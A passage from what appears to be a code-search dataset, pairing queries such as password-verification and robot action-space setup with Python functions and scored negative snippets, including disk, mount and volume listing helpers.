'^sd.*[A-Z]'\")\n\t\tfor line in disks_lines.splitlines():\n\t\t\tdisk_t = line.split()\n\t\t\tif len(disk_t) > 1 and \"LSI\" not in disk_t[1]:\n\t\t\t\tdisks.append(disk_t[0])\n\t\tds = []\n\t\tfor i in disks:\n\t\t\td_t = DiskFromLsiSas3(\"\", i)\n\t\t\td_t.fill_attrs()\n\t\t\tds.append(d_t)\n\t\treturn ds", "def get_all_disks():\n return DISKS_API.get(abs_link=False)", "def get_devices_lsscsi(self):\n\n try:\n message = \"Find SCSI Devices\"\n if self._include_enclosures:\n command = \"lsscsi --generic --transport | egrep 'disk|0x14|enclo'\"\n else:\n command = \"lsscsi --generic --transport | fgrep 'disk|0x14'\"\n pdata = self._run_command(command=command, message=message, logger=self._logger, shell=True)\n #\n # Format:\n # $ lsscsi --generic --transport\n # [0] [1] [2] [3] [4]\n # [0:0:0:0] disk sas:0x5000cca25103b471 /dev/sda /dev/sg0 \n # [0:0:1:0] disk sas:0x5000cca251029301 /dev/sdb /dev/sg1 \n # ...\n # [0:0:14:0] enclosu sas:0x5001636001caa0bd - /dev/sg14\n # [7:0:0:0] cd/dvd usb: 1-1.3:1.2 /dev/sr0 /dev/sg15\n #\n # Special Case:\n # Handle lines without a transport (spaces only). 
(screen scrapping danger)\n # [0:0:10:0] enclosu sas:0x50030480091d71fd - /dev/sg10\n # [1:0:0:0] disk <spaces> /dev/sdk /dev/sg11 <- INTEL disk!\n #\n # Another SNAFU! (and why I hate screen scrapping!!!)\n # [15:0:53597:0]disk sas:0x5000cca23b359649 /dev/sdg /dev/sg6 \n # [15:0:53598:0]disk sas:0x5000cca23b0c0a99 /dev/sdh /dev/sg7 \n # [15:0:53599:0]disk sas:0x5000cca23b0b7531 /dev/sdi /dev/sg8 \n # ...\n # [15:0:53686:0]enclosu sas:0x5000ccab040001bc - /dev/sg165\n # [15:0:53766:0]enclosu sas:0x5000ccab040001fc - /dev/sg144\n #\n # Evidently, the author of lsscsi did not think of consistent output! ;(\n #\n for line in pdata['stdout'].splitlines():\n dinfo = line.split()\n device = dict()\n if len(dinfo) < 5:\n m = re.search('(?P<device>disk|\\(0x14\\)|enclosu)', dinfo[0])\n if m:\n device['Device Type'] = m.group('device')\n sas_index = 1\n dev_index = 2\n sg_index = 3\n else:\n continue\n else:\n device['Device Type'] = dinfo[1]\n sas_index = 2\n dev_index = 3\n sg_index = 4\n\n # lsscsi does not understand 'Host Managed' device type.\n if '0x14' in device['Device Type']:\n device['Device Type'] = 'disk'\n\n # Parse remaining information.\n if 'sas:' in dinfo[sas_index]:\n device['SAS Address'] = dinfo[sas_index][4:]\n self._sas_addresses += 1\n else:\n device['SAS Address'] = \"\"\n\n # Note: Enclosure has no driver, so reports '-' for name.\n if '/dev/' in dinfo[dev_index]:\n if self._drives and not dinfo[dev_index] in self._drives:\n continue\n if self._exclude and dinfo[dev_index] in self._exclude:\n continue\n device['Linux Device Name'] = dinfo[dev_index]\n else:\n device['Linux Device Name'] = \"\"\n if '/dev/sg' in dinfo[sg_index]:\n device['SCSI Device Name'] = dinfo[sg_index]\n else:\n device['SCSI Device Name'] = \"\"\n\n self._devices.append(device)\n\n except RuntimeError as exc:\n self._logger.error(\"Failed to acquire SCSI devices: {0}\".format(exc))\n raise exc", "def mounts():\r\n ret = []\r\n with open('/proc/mounts') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n m = re.match(\r\n r'(?P<src>\\S+) (?P<dest>\\S+) (?P<type>\\S+)', line)\r\n if m:\r\n ret.append(m.groupdict())\r\n return ret", "def get_ceph_drv_info():\n disks_info = []\n stat = psutil.disk_io_counters(perdisk=True)\n for drv in get_ceph_disk():\n info = CEPHDiskInfo(drv)\n disk = basename(drv)\n if disk in stat:\n info.rd_cnt = stat[disk].read_count\n info.wr_cnt = stat[disk].write_count\n info.rd_bytes = stat[disk].read_bytes\n info.wr_bytes = stat[disk].write_bytes\n info.rd_time = stat[disk].read_time\n info.wr_time = stat[disk].write_time\n\n disks_info.append(info)\n\n return disks_info", "def device_mounted(uuid):\n out, err = run_cmd(['lsblk', '-o', 'NAME,UUID,MOUNTPOINT', '--json'])\n\n blockdevices = json.loads(out)['blockdevices']\n\n for blkdevice in blockdevices:\n if key_exists('children', blkdevice):\n for child in blkdevice['children']:\n if key_exists('mountpoint', child) and child['uuid'] == uuid:\n return child['mountpoint']", "def get_disks():\n\n if system() != \"Windows\":\n raise OSError(\"For use with Windows platforms.\")\n\n logicaldisks=run(\n [\"wmic\", \"logicaldisk\", \"get\", \"name\"],\n capture_output=True\n )\n\n return findall(\"[A-Z]:\", str(logicaldisks.stdout))", "def volume(self):\n return [node.volume for node in self]", "def mounts(self) -> list[str]:\n _args: list[Arg] = []\n _ctx = self._select(\"mounts\", _args)\n return _ctx.execute_sync(list[str])", "def list_volumes(self):\n\n print(self.format_string % (\"OpenStack Volume\", \"ScaleIO Name\", 
\"ScaleIO ID\", \"Attached\"))\n for os_volume in self.openstack.block_store.volumes(details=True,\n all_tenants=self.args.OS_ALL_TENANTS):\n sio_volume = self._convert_os_to_sio(os_volume.id)\n try:\n vol_id = self.scaleio.get_volumeid(sio_volume)\n if vol_id is not None:\n attached = 'True'\n if not os_volume.attachments:\n attached = 'False'\n print(self.format_string % (os_volume.id, sio_volume, vol_id, attached))\n except:\n # if we got here, there is no SIO volume for the openstack volume\n pass", "def get_persistent_volumes(k8s_ctx: str) -> List[str]:\n cmd = f'kubectl --context={k8s_ctx} get pv -o json'\n p = safe_exec(cmd)\n try:\n dvols = json.loads(p.stdout.decode())\n except Exception as err:\n raise RuntimeError('Error when parsing listing of Kubernetes persistent volumes ' + str(err))\n if dvols is None:\n raise RuntimeError('Result of kubectl pv listing could not be read properly')\n return [i['metadata']['name'] for i in dvols['items']]", "def volume():\n vol = sonos.volume\n return vol", "def get_vdcs(self):\n if self._check_for_7k():\n self.logger.debug('Getting VDC information from {}'.format(self.host))\n vdcxml = self._ncc.nxoscli('show vdc')\n vdcparsed = _begin_parse(vdcxml)\n vdcschema = parse_get_nsmap(vdcparsed)\n showvdc = parse_xml_heirarchy('ROW_vdc', ['vdc_id', 'vdc_name', 'state'], vdcschema,\n vdcparsed)\n vdcs = {}\n for v in showvdc:\n self.logger.debug(\n 'VDC {} {} {} on {}'.format(v['vdc_id'], v['vdc_name'], v['state'], self.host))\n vdcs[v['vdc_name']] = VDC(**v)\n if v['vdc_id'] == '1':\n self.default_vdc = v['vdc_name']\n self.vdcs = vdcs\n self.logger.debug(vdcs)" ]
[ "0.6761455", "0.6402484", "0.6302538", "0.625908", "0.62256217", "0.6195324", "0.6118881", "0.59791917", "0.595759", "0.59439385", "0.59184736", "0.584555", "0.581235", "0.5800224", "0.5754875", "0.57339233", "0.5706948", "0.5706084", "0.56977904", "0.56800914", "0.5660114", "0.56451297", "0.560772", "0.55752075", "0.55604374", "0.55377585", "0.54954857", "0.5469062", "0.54658854", "0.5461836" ]
0.7416448
0
Verifies that the password and the verify-password value match.
def verify_match(password, verify):
    return password == verify
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def test_password_verification(self):\n self.user.password = '123456'\n self.assertTrue(self.user.verify_password('123456'))\n self.assertFalse(self.user.verify_password('password'))", "def verify_password(self, password):\n return pwd_context.verify(password, self.password)", "def verify_password(self, password):\n return self.PASS == password", "def verify_password(self, password):\n return self.PASSWORD == password", "def matches_password_verify(password, verify):\n if password and not password == verify:\n return \"Your passwords didn't match.\"\n else:\n return \"\"", "def verify_password(self, password):\n self.password_hash = generate_password_hash(password)\n\n return check_password_hash(self.password_hash, password)", "def verify_password(saved_password, password):\n return check_password_hash(saved_password, password)", "def verify_password(self, password):\n return Bcrypt().check_password_hash(self.password, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(entered_password):\n return PASSWORD_RE.match(entered_password)", "def check_password(pw):\n if (pw == password):\n print('welcome password match')\n\n else:\n print('Wrong password')", "def verify_password(self, hash, password):\r\n try:\r\n PasswordHasher().verify(hash, password)\r\n return True\r\n except:\r\n return False", "def validate_password(self, password):\n return self._password == encrypt_password(password,\n b64decode(str(self._salt)))", "def verify_password(password, password_hash):\n\n password_entered = hash_password(password)\n return secrets.compare_digest(password_entered, password_hash)", "def test_check_password(self):\n user = User.query.filter_by(username='eschoppik').first()\n self.assertTrue(bcrypt.check_password_hash(user.password, 'secret'))\n self.assertFalse(bcrypt.check_password_hash(user.password, 'notsecret'))", "def password_is_correct(self, password):\n return Bcrypt().check_password_hash(self.password, password)", "def validate_password(self, password):\n return Bcrypt().check_password_hash(self.password, password)", "def check_password(self, password):\n return self.password == password", "def verify_password(self, password):\n user = self.get()\n if user:\n return bcrypt.verify(password, user['password'])\n return False", "def verify_password(self, password):\n stored_password = self.user_in_db['password']\n password_valid = passwords.verify_password(\n password, stored_password)\n\n if not password_valid:\n # Invalid password\n return {'error': 'Invalid email and password combination'}\n\n return {'success': True}", "def verify_pw(username, password):\n global password_store\n logger = logging.getLogger('verify_pw')\n if not password_store:\n logger.error(\"No password store specified\")\n return False\n 
logger.debug(\"Verifying password for %s\" % username)\n return password_store.verify(username, password)", "def verify_password(stored_passwd, provided_passwd):\n salt = stored_passwd[:64]\n stored_password = stored_passwd[64:]\n pwdhash = hashlib.pbkdf2_hmac(\n 'sha512', provided_passwd.encode('utf-8'), salt.encode('ascii'), 100000\n )\n pwdhash = binascii.hexlify(pwdhash).decode('ascii')\n return pwdhash == stored_password", "def check_password(self, password):\n\n if self.password is None:\n return False\n return check_password_hash(self.password, password)" ]
[ "0.8170263", "0.7866674", "0.7849448", "0.7771099", "0.7748505", "0.7726481", "0.77033484", "0.7687431", "0.7640428", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7579744", "0.7566419", "0.74769354", "0.74679476", "0.74629104", "0.743957", "0.7417796", "0.7405744", "0.73882514", "0.7383286", "0.7357166", "0.7332444", "0.7316226", "0.7296673" ]
0.8035081
1
Fallback attribute getter. It enables access to the attributes and methods of the low-level Simulator directly, without having to go through `simulator`.
def __getattr__(self, name: str) -> Any:
    return getattr(self.__getattribute__('simulator'), name)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __getattr__(self, attr): # or does it ?\n return self.X[attr]", "def __getattr__(self, name: str) -> Any:\n return self.__getattribute__(name)", "def __getattribute__(self, attr):\n if attr in ('make_rdm1s', 'spin_square', 'contract_2e',\n 'absorb_h1e'):\n raise AttributeError\n else:\n return object.__getattribute__(self, attr)", "def __getattribute__(self, attr):\n if attr in ('make_rdm1s', 'spin_square', 'contract_2e',\n 'absorb_h1e'):\n raise AttributeError\n else:\n return object.__getattribute__(self, attr)", "def __getattr__(self, attr):\n return self.get(attr)", "def __getattribute__(self, name):\n if name in [\"sampling_function\", \"env\", \"fit_dist\", \"reset\"]:\n return object.__getattribute__(self, name)\n\n else:\n return getattr(self.env, name)", "def _fget(self):\n # type: (...) -> Any\n try:\n return getattr(self, private_attr)\n except AttributeError:\n raise AttributeError(\n \"'{}' object has no attribute '{}'\".format(\n _get_type_name(type_), attr\n )\n )", "def __getattr__(self, attr):\n if attr in self._evtData_attrs:\n return getattr(self.evtData, attr)\n \n if attr in self._epicsLive_attrs:\n return getattr(self.epicsLive, attr)\n\n if attr in self._epicsStore_attrs:\n return getattr(self.epicsStore, attr)\n\n if attr in self.parameters:\n return self.parameters[attr]\n\n if attr in self._user_funcs:\n return self.get_function(attr)\n\n# if 'detectors' in self._det and attr in self._det['detectors']:\n if attr in self._detectors_attrs:\n return getattr(self._data, self._det['detectors'][attr])", "def __getattribute__(self, name):\n try:\n return self.gps.__getattribute__(name) \n except:\n return super().__getattribute__(name)", "def get_attr(self, key: str) -> Any:\n raise NotImplementedError(\"This method should be implemented by \"\n \"subclasses.\")", "def __getattr__(self, name):\n try:\n x = getattr(self.benchmarker, name)\n except AttributeError:\n print(\"AttributeError: {!s} not a member of FrameworkTest or Benchmarker\".format(name))\n print(\"This is probably a bug\")\n raise\n return x", "def __getattr__(self, name: str) -> Any:\n # We don't want to return anything for python copy / pickle methods.\n if name in _UNDEFINED_COPY_PICKLE_METHODS:\n raise AttributeError()\n self._try_setup()\n if name in self.__dict__:\n return self.__dict__[name]\n else:\n raise AttributeError(\n f'\"{self.__class__.__name__}\" object has no attribute \"{name}\"')", "def get_attr(self, name: str):\n return self.call(name)", "def __getattr__(self, name):\n if not name in self._attrs.iterkeys():\n raise AttributeError(name)\n return self._attrs[name]", "def __getattr__(self, attribute):\n if attribute.startswith('__'):\n raise AttributeError\n return getattr(self._http, attribute)", "def __getattr__(self, attr):\n return getattr(self.get_function(), attr)", "def __getattr__(self, name):\n if name in self:\n return self[name]\n raise AttributeError(_(\"Unknown attribute '%s'.\") % name)", "def get_attribute(self, attr):\n super().get_attribute(attr) # Keep this line, it triggers the parent class method.\n return getattr(self, attr)", "def __getattr__ (self, attr):\n try:\n return self.get_value (attr)\n except exc.x_not_found:\n try:\n return self.get_key (attr)\n except exc.x_not_found:\n raise AttributeError", "def __getattribute__(self,name):\n try:\n return object.__getattribute__(self,name)\n except AttributeError:\n extraPO = object.__getattribute__(self,'_extraPO')\n\n if hasattr(extraPO,name):\n return getattr(extraPO,name) # HIDDEN!\n\n _attr_err_msg = 
object.__getattribute__(self,'_attr_err_msg')\n\n raise AttributeError(_attr_err_msg(name,[self,extraPO]))", "def __getattr__(self, attribute):\n\t\tassert ltrace_func(TRACE_BASE)\n\n\t\ttry:\n\t\t\treturn dict.__getitem__(self, attribute)\n\n\t\texcept KeyError:\n\t\t\ttry:\n\t\t\t\treturn dict.__getattr__(self, attribute)\n\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\treturn NamedObject.__getattr__(self, attribute)\n\n\t\t\t\texcept AttributeError:\n\t\t\t\t\traise AttributeError(\"'%s' %s%s\" % (stylize(ST_BAD, attribute),\n\t\t\t\t\t\t\t'' if attribute in self.__class__._licorn_protected_attrs\n\t\t\t\t\t\t\t\telse ('\\n\\t- it is currently missing from %s '\n\t\t\t\t\t\t\t\t\t'(currently=%s)' % ('%s.%s' % (\n\t\t\t\t\t\t\t\t\t\tstylize(ST_NAME, self.name),\n\t\t\t\t\t\t\t\t\t\tstylize(ST_ATTR,'_licorn_protected_attrs')),\n\t\t\t\t\t\t\t\t', '.join(stylize(ST_COMMENT, value)\n\t\t\t\t\t\t\t\t\tfor value in self.__class__._licorn_protected_attrs))),\n\t\t\t\t\t\t\t'\\n\\t- perhaps you tried to %s a %s?' % (\n\t\t\t\t\t\t\t\tstylize(ST_ATTR, 'getattr()'),\n\t\t\t\t\t\t\t\tstylize(ST_COMMENT, 'property()'))))", "def __getattr__(self, key):\n return self.get_attribute(key)", "def get_attribute(self, name):\n\n pass", "def __tr_getattr__(self, name):\n raise AttributeError(name)", "def __tr_getattr__(self, name):\n raise AttributeError(name)", "def test_getter_shadowing(self):\n class Test(pyperry.Base):\n\n @property\n def foo(self):\n return \"purple\"\n\n Test.attributes('foo')\n test = Test({'foo': 1})\n\n self.assertEqual(test.foo, 'purple')\n self.assertEqual(test['foo'], 1)", "def __getattribute__(self, attr):\n if attr in ['reset_opt_vars', 'initialize_globals',\n 'set_tensor_dict', 'get_tensor_dict',\n 'get_required_tensorkeys_for_function',\n 'initialize_tensorkeys_for_functions',\n 'save_native', 'load_native', 'rebuild_model',\n 'set_optimizer_treatment',\n 'train', 'train_batches', 'validate']:\n return self.runner.__getattribute__(attr)\n return super(FederatedModel, self).__getattribute__(attr)", "def __getattr__(self, attr):\n return getattr(self.door, attr)", "def __getattribute__(self, name):\n # special attribute that need to go straight to this obj\n if name in ['pget', 'pobj', '_delegate', '_wrap', '_get', \n '__class__', '__array_finalize__', 'view', '__tr_getattr__']:\n return object.__getattribute__(self, name)\n\n try:\n return self.__tr_getattr__(name)\n except:\n pass\n\n if hasattr(self.pobj, name):\n return self._wrap(name) \n \n return object.__getattribute__(self, name)", "def __getattr__(self, attr):\n # orig_attr = self._wrapped_env.__getattribute__(attr)\n if hasattr(self._wrapped_env, '_wrapped_env'):\n orig_attr = self._wrapped_env.__getattr__(attr)\n else:\n orig_attr = self._wrapped_env.__getattribute__(attr)\n\n if callable(orig_attr):\n def hooked(*args, **kwargs):\n result = orig_attr(*args, **kwargs)\n return result\n\n return hooked\n else:\n return orig_attr" ]
[ "0.67445457", "0.6710345", "0.66448665", "0.66448665", "0.65809125", "0.6559927", "0.6550173", "0.65467125", "0.6515998", "0.64669317", "0.6441641", "0.6401199", "0.6396703", "0.6377469", "0.6359223", "0.63081247", "0.630343", "0.62833256", "0.62700075", "0.6269952", "0.6243726", "0.6221988", "0.6219931", "0.62127954", "0.62127954", "0.61993635", "0.61885875", "0.61625934", "0.6162532", "0.61428946" ]
0.6841757
0
Configure the action space of the environment. The action is a vector gathering the torques of the actuators of the robot.
def _initialize_action_space(self) -> None:
    # Get effort limit
    command_limit = self.robot.command_limit

    # Replace inf bounds of the effort limit if requested
    if self.enforce_bounded_spaces:
        for motor_name in self.robot.motors_names:
            motor = self.robot.get_motor(motor_name)
            motor_options = motor.get_options()
            if not motor_options["enableCommandLimit"]:
                command_limit[motor.joint_velocity_idx] = \
                    MOTOR_EFFORT_MAX

    # Set the action space
    action_scale = command_limit[self.robot.motors_velocity_idx]
    self.action_space = spaces.Box(
        low=-action_scale, high=action_scale, dtype=np.float64)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_up_continuous_action_space(self):\n self.action_space = gym.spaces.Box(shape=(self.action_dim,),\n low=-1.0,\n high=1.0,\n dtype=np.float32)\n self.action_high = self.torque * np.ones([self.action_dim])\n self.action_low = -self.action_high", "def buildActionSpace(self):\n self.action_types = self.AGENT_TYPES\n self.action_space = Dict({\n \"action\": Discrete(len(self.AGENT_TYPES)), \n })\n self.action_space.shape = (len(self.action_types),)", "def set_up_discrete_action_space(self):\n self.action_list = [[self.torque, 0, 0, 0, 0, 0], [-self.torque, 0, 0, 0, 0, 0],\n [0, self.torque, 0, 0, 0, 0], [\n 0, -self.torque, 0, 0, 0, 0],\n [0, 0, self.torque, 0, 0, 0], [\n 0, 0, -self.torque, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]]\n self.action_space = gym.spaces.Discrete(len(self.action_list))\n self.setup_keys_to_action()", "def __init__(self, env: gym.Env):\n Env.__init__(self)\n\n self.env = ShapedActionWrapper(env)\n\n self.state_space = self.env.observation_space.shape\n self.action_space = self.env.action_space.shape", "def _set_action(self, action):\n action = np.asarray(action)\n action = np.clip(action, self.action_space.low, self.action_space.high)\n ctrl = self.robot.denormalize_position_control(\n position_control=action, relative_action=self.constants.relative_action,\n )\n self.robot.set_position_control(ctrl)", "def set_actuator(self, action):\n deltav = action[0]\n vt = np.clip(self.vt + deltav, -self.maxV, self.maxV)\n self.vt = vt\n p.setJointMotorControl2(bodyUniqueId=self.botId,\n jointIndex=0,\n controlMode=p.VELOCITY_CONTROL,\n targetVelocity=vt)\n p.setJointMotorControl2(bodyUniqueId=self.botId,\n jointIndex=1,\n controlMode=p.VELOCITY_CONTROL,\n targetVelocity=-vt)", "def mocap_set_action(self, action):\n # @Melissa: Action = 3DOF Cartesian Position Delta + Quaternion\n if self.sim.model.nmocap > 0:\n action, _ = np.split(action, (self.sim.model.nmocap * 7, ))\n action = action.reshape(self.sim.model.nmocap, 7)\n\n pos_delta = action[:, :3]\n quat_delta = action[:, 3:]\n\n self.reset_mocap2body_xpos()\n self.sim.data.mocap_pos[:] = self.sim.data.mocap_pos + pos_delta\n self.sim.data.mocap_quat[:] = self.sim.data.mocap_quat + quat_delta", "def __init__(self, observation_space, action_space, config, unsupType='action', envWrap=False, designHead='universe', noReward=False):\n self.unsup = unsupType is not None\n self.cur_batch = None\n\n predictor = None\n numaction = action_space.n\n\n config = dict(ray.rllib.agents.a3c.a3c.DEFAULT_CONFIG, **config)\n self.config = config\n self.sess = tf.get_default_session()\n\n # Setup the policy\n # =====================================================================\n self.observations = tf.placeholder(tf.float32, [None] + list(observation_space.shape))\n dist_class, logit_dim = ModelCatalog.get_action_dist(action_space, self.config[\"model\"])\n\n # NOTE: value function and trainable variables are defined in self.model\n # Define the policy network\n self.model = pi = ModelCatalog.get_model(self.observations, logit_dim, self.config[\"model\"])\n action_dist = dist_class(self.model.outputs)\n\n # Define S/S+A predictor network\n if self.unsup:\n with tf.variable_scope(\"predictor\"):\n if 'state' in unsupType:\n self.local_ap_network = predictor = StatePredictor(observation_space.shape, numaction, designHead, unsupType)\n else:\n self.local_ap_network = predictor = StateActionPredictor(observation_space.shape, numaction, designHead)\n\n # Setup the policy loss\n # 
=====================================================================\n if isinstance(action_space, gym.spaces.Box):\n ac_size = action_space.shape[0]\n actions = tf.placeholder(tf.float32, [None, ac_size], name=\"ac\")\n elif isinstance(action_space, gym.spaces.Discrete):\n actions = tf.placeholder(tf.int64, [None], name=\"ac\")\n else:\n raise UnsupportedSpaceException(\n \"Action space {} is not supported for A3C.\".format(\n action_space))\n advantages = tf.placeholder(tf.float32, [None], name=\"advantages\")\n self.v_target = tf.placeholder(tf.float32, [None], name=\"v_target\")\n\n # compute policy loss and predictor loss\n self.loss = A3CLoss(action_dist, actions, advantages, self.v_target,\n self.model.vf, unsupType, predictor, self.config[\"vf_loss_coeff\"],\n self.config[\"entropy_coeff\"])\n\n # Initialize TFPolicyGraph\n loss_in = [\n (\"obs\", self.observations),\n (\"actions\", actions),\n (\"advantages\", advantages),\n (\"value_targets\", self.v_target),\n ]\n LearningRateSchedule.__init__(self, self.config[\"lr\"],\n self.config[\"lr_schedule\"])\n TFPolicyGraph.__init__(\n self,\n observation_space,\n action_space,\n self.sess,\n obs_input=self.observations,\n action_sampler=action_dist.sample(),\n loss=self.loss.total_loss,\n loss_inputs=loss_in,\n state_inputs=self.model.state_in,\n state_outputs=self.model.state_out,\n seq_lens=self.model.seq_lens,\n max_seq_len=self.config[\"model\"][\"max_seq_len\"])\n\n self.stats_fetches = {\n \"stats\": {\n \"cur_lr\": tf.cast(self.cur_lr, tf.float64),\n \"policy_loss\": self.loss.pi_loss,\n \"policy_entropy\": self.loss.entropy,\n \"grad_gnorm\": tf.global_norm(self._grads),\n \"var_gnorm\": tf.global_norm(self.model.var_list),\n \"vf_loss\": self.loss.vf_loss,\n \"vf_explained_var\": explained_variance(self.v_target, self.model.vf),\n },\n }\n\n self.sess.run(tf.global_variables_initializer())", "def _set_action(self, action):\n\n rospy.logdebug(\"Start Set Action ==>\"+str(action))\n # We convert the actions to speed movements to send to the parent class of Parrot\n linear_speed_vector = Vector3()\n angular_speed = 0.0\n\n if action == 0: # FORWARDS\n linear_speed_vector.x = self.linear_forward_speed\n self.last_action = \"FORWARDS\"\n elif action == 1: # BACKWARDS\n linear_speed_vector.x = -1*self.linear_forward_speed\n self.last_action = \"BACKWARDS\"\n elif action == 2: # STRAFE_LEFT\n linear_speed_vector.y = self.linear_forward_speed\n self.last_action = \"STRAFE_LEFT\"\n elif action == 3: # STRAFE_RIGHT\n linear_speed_vector.y = -1*self.linear_forward_speed\n self.last_action = \"STRAFE_RIGHT\"\n elif action == 4: # UP\n linear_speed_vector.z = self.linear_forward_speed\n self.last_action = \"UP\"\n elif action == 5: # DOWN\n linear_speed_vector.z = -1*self.linear_forward_speed\n self.last_action = \"DOWN\"\n\n # We tell drone the linear and angular speed to set to execute\n self.move_base(linear_speed_vector,\n angular_speed,\n epsilon=0.05,\n update_rate=10)\n\n rospy.logdebug(\"END Set Action ==>\"+str(action))", "def __init__(self, env):\n self.env = env\n # set up observation space\n high = np.inf\n low = -high\n\n obs_spec = env.observation_spec()\n\n space_spec = {}\n\n for k,v in obs_spec.items():\n space_spec[k]=spaces.Box(low=low,high=high, shape=v)\n\n\n self.observation_space = spaces.Dict(space_spec)\n\n # setup action space\n low, high = self.env.action_spec\n self.action_space = spaces.Box(low=low, high=high)\n\n self.reward_range = self.env.reward_range", "def _setup_spaces(self):\n # Actions are the 
changes in weights of risky\n N = self.n_risky_assets\n self.action_space = gym.spaces.Box( low = -np.ones( (N,) ), \n high = +np.ones( (N,) ) )\n \n # Define the dimensions of the observation space, starting with the portfolio value & weights\n param_ranges = self.asset_process.get_parameter_ranges()\n min_asset_val, max_asset_val = -np.inf, np.inf\n low = min_asset_val * np.ones((N+1,))\n high = max_asset_val * np.ones((N+1,))\n \n if self.benchmark_weights is not None:\n # Repeat the low / high limits for the benchmark\n low = np.hstack( [ low, low ] )\n high = np.hstack( [ high, high ] )\n \n # Add the parameter ranges\n low = np.hstack( [ low, param_ranges.low ] )\n high = np.hstack( [ high, param_ranges.high ] )\n \n # Add the timestamp, for non-recurrent environments\n if not self.is_recurrent:\n low = np.hstack( [ 0, low ] )\n high = np.hstack( [ self.max_episode_steps, high ] )\n \n self.observation_space = gym.spaces.Box( low=low, high=high )", "def apply_action(self, physics, action, random_state):\n del random_state\n physics.bind(self.actuators).ctrl = action", "def ctrl_set_action(self, action):\n\n # @Melissa: This needs to be changed because you have 6DOF on the EndEffector, but this only does the last three\n for i in (-1, -2, -3):\n self.sim.data.ctrl[i] = action[i]", "def __init__(\n self,\n num_envs: int,\n observation_space: gym.Space,\n action_space: gym.Space,\n ):\n self.num_envs = num_envs\n self.is_vector_env = True\n self.observation_space = batch_space(observation_space, n=num_envs)\n self.action_space = batch_space(action_space, n=num_envs)\n\n self.closed = False\n self.viewer = None\n\n # The observation and action spaces of a single environment are\n # kept in separate properties\n self.single_observation_space = observation_space\n self.single_action_space = action_space", "def initObservationAndActionSpaces(self):\n self.action_space = self.microgridPolicy.createActionSpace();\n self.observation_space = self.microgridPolicy.createObservationSpace();", "def define_spaces(self) -> None:\n self.observation_type = observation_factory(self, self.config[\"observation\"])\n self.action_type = action_factory(self, self.config[\"action\"])\n self.observation_space = self.observation_type.space()\n self.action_space = self.action_type.space()", "def action_space(self):\n\n return Box(low=np.array(self.action_low), high=np.array(self.action_high), dtype=np.float32)", "def __init__(self, env):\n super(PlayerOneNetworkControllerWrapper, self).__init__(env)\n buttons = [\"B\", \"A\", \"MODE\", \"START\", \"UP\", \"DOWN\", \"LEFT\", \"RIGHT\", \"C\", \"Y\", \"X\", \"Z\"]\n actions = [['LEFT'], ['RIGHT'], ['LEFT', 'DOWN'], ['RIGHT', 'DOWN'],['LEFT', 'UP'],['RIGHT', 'UP'],\n ['DOWN', 'B'],['LEFT', 'UP'],['RIGHT', 'DOWN','B'],['RIGHT', 'DOWN','A'],\n ['RIGHT', 'UP','B'],['RIGHT', 'UP','A'],['RIGHT', 'UP','C'],\n ['LEFT', 'UP','B'],['LEFT', 'UP','A'],['LEFT', 'UP','C'],\n ['C'],['START'], ['B'],['Y'],['X'],['Z'],['A'],['UP'],['MODE']]\n self._actions = []\n for action in actions:\n arr = np.array([False] * 12)\n for button in action:\n arr[buttons.index(button)] = True\n self._actions.append(arr)\n self.action_space = gym.spaces.Discrete(len(self._actions))", "def apply_action(self, action):\n real_action = self.policy_action_to_robot_action(action)\n p.setGravity(0, 0, 0)\n p.resetBaseVelocity(\n self.robot_ids[0], real_action[:3], real_action[3:])", "def action_space(self, val: Union[List[ActionSpace], ActionSpace]):\n self._action_space = val", "def __init__(self, 
environment):\n self.env = environment\n self.cumreward = 0 # tracking cumulative reward\n self.samples = 0 # tracking the number of samples\n\n self.sensor_limits = None\n self.actor_limits = None\n self.clipping = True\n\n self.current_action = 0 # Saving current action\n self.prev_action = -1 # Saving previous action", "def __init__(self, env, num_actions):\n super(MultiBinaryPadEnv, self).__init__(env)\n assert num_actions >= env.action_space.n\n self._num_actions = num_actions\n self.action_space = gym.spaces.MultiBinary(num_actions)", "def action_space(self):\n return Box(low=-5, high=5, shape=(self.num_cars, ))", "def action_space(self):\n return gym.spaces.Discrete(self._action_dim)", "def __init__(\n self,\n states_spec,\n actions_spec,\n batched_observe=1000,\n scope='constant',\n action_values=None\n ):\n\n if action_values is None:\n raise TensorForceError(\"No action_values for constant model provided.\")\n self.action_values = action_values\n\n super(ConstantAgent, self).__init__(\n states_spec=states_spec,\n actions_spec=actions_spec,\n batched_observe=batched_observe,\n scope=scope\n )", "def get_environment_actions(self, init_act):\n # Set initial values for environment variables\n time_of_day = \"2020-10-23T06:00:00\"\n time_animation = \"false\"\n cloud_state = \"free\"\n fog_range = \"100000\"\n sun_intensity = \"0.85\"\n sun_azimuth = \"0\"\n sun_elevation = \"1.31\"\n percip_type = \"dry\"\n percip_intensity = \"0\"\n\n try:\n env_layer = QgsProject.instance().mapLayersByName(\"Environment\")[0]\n for feature in env_layer.getFeatures():\n time_of_day = feature[\"Datetime\"]\n time_animation = str(feature[\"Datetime Animation\"]).lower()\n cloud_state = feature[\"Cloud State\"]\n fog_range = str(feature[\"Fog Visual Range\"])\n sun_intensity = str(feature[\"Sun Intensity\"])\n sun_azimuth = str(feature[\"Sun Azimuth\"])\n sun_elevation = str(feature[\"Sun Elevation\"])\n percip_type = feature[\"Precipitation Type\"]\n percip_intensity = str(feature[\"Precipitation Intensity\"])\n except IndexError:\n error_message = \"No environment variables detected, using defaults\"\n iface.messageBar().pushMessage(\"Info\", error_message, level=Qgis.Info)\n 